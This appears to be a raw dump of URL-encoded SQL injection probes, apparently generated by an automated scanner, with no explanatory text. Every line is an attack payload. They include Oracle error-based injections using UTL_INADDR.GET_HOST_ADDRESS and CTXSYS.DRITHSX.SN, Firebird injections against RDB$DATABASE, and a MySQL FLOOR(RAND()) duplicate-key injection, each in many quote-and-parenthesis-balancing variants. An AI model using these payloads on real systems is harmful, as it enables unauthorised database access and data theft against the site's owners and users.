-5062%22%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%22saRb%22%3D%22saRb -6227%22%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22jVon%22%3D%22jVon -8796%22%29%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22fukf%22%3D%22fukf -4551%22%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%22PaKB%22%3D%22PaKB -2693%22%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%22xePv%22%20LIKE%20%22xePv -9536%22%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22Jpis%22%20LIKE%20%22Jpis -7930%22%29%29%29%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22zpua%22%20LIKE%20%22zpua -9981%22%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%20AND%20%22zEGw%22%20LIKE%20%22zEGw -6554%29%20WHERE%201493%3D1493%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -4384%27%29%20WHERE%205108%3D5108%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -2222%27%20WHERE%206478%3D6478%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -7709%22%20WHERE%206179%3D6179%20OR%204971%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284971%3D4971%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29 -6586%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -1214%27%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -9579%27%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -6584%22%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -7459%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%289957%3D9957 -7695%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%283352%3D3352 -9625%29%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%281654%3D1654 -7324%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -8113%27%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27rJzu%27%3D%27rJzu -3026%27%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27rDnQ%27%3D%27rDnQ -8380%27%29%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27CDol%27%3D%27CDol -1690%27%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%27ahjZ%27%3D%27ahjZ -5311%27%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27NwTl%27%20LIKE%20%27NwTl -4740%27%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27YhNi%27%20LIKE%20%27YhNi -6205%27%29%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27lQkF%27%20LIKE%20%27lQkF -3848%27%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%27LJSe%27%20LIKE%20%27LJSe -7863%22%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22uUlx%22%3D%22uUlx -7690%22%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22mlIj%22%3D%22mlIj -7904%22%29%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22HOOX%22%3D%22HOOX -4110%22%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%22Fwpo%22%3D%22Fwpo -9031%22%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22xtuQ%22%20LIKE%20%22xtuQ -7663%22%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22XbOU%22%20LIKE%20%22XbOU -9026%22%29%29%29%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22Tucm%22%20LIKE%20%22Tucm -2815%22%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29%20AND%20%22AnfG%22%20LIKE%20%22AnfG -9167%29%20WHERE%205818%3D5818%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -1185%27%29%20WHERE%206354%3D6354%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -4454%27%20WHERE%207294%3D7294%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -7130%22%20WHERE%201668%3D1668%20OR%201643%3DCTXSYS.DRITHSX.SN%281643%2C%28CHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281643%3D1643%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%29%29 -3675%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -2187%27%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -4313%27%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -5361%22%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -4006%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%286950%3D6950 -1941%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%289424%3D9424 -9756%29%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%286396%3D6396 -2067%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -6484%27%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%27YuvZ%27%3D%27YuvZ -8457%27%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%27Jclr%27%3D%27Jclr -3430%27%29%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%27fUMM%27%3D%27fUMM -9713%27%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%27SxUi%27%3D%27SxUi -8505%27%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%27tbLk%27%20LIKE%20%27tbLk -2551%27%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%27bgmB%27%20LIKE%20%27bgmB -8985%27%29%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%27xJYq%27%20LIKE%20%27xJYq -5238%27%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%27EKpM%27%20LIKE%20%27EKpM -4157%22%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%22pQEs%22%3D%22pQEs -1480%22%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%22dNxU%22%3D%22dNxU -5311%22%29%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%22KNIx%22%3D%22KNIx -7330%22%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%22DzXR%22%3D%22DzXR -1473%22%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%22YEFh%22%20LIKE%20%22YEFh -2491%22%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%22BYPB%22%20LIKE%20%22BYPB -9945%22%29%29%29%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%28%28%28%22ZYDn%22%20LIKE%20%22ZYDn -6489%22%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29%20AND%20%22dywP%22%20LIKE%20%22dywP -8852%29%20WHERE%207289%3D7289%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -3979%27%29%20WHERE%203288%3D3288%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -9157%27%20WHERE%202531%3D2531%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 -8863%22%20WHERE%209588%3D9588%20OR%201560%3D%28%27%3Ajqa%3A%27%7C%7C%28SELECT%20CASE%201560%20WHEN%201560%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Augj%3A%27%29 %28SELECT%202811%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282811%3D2811%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 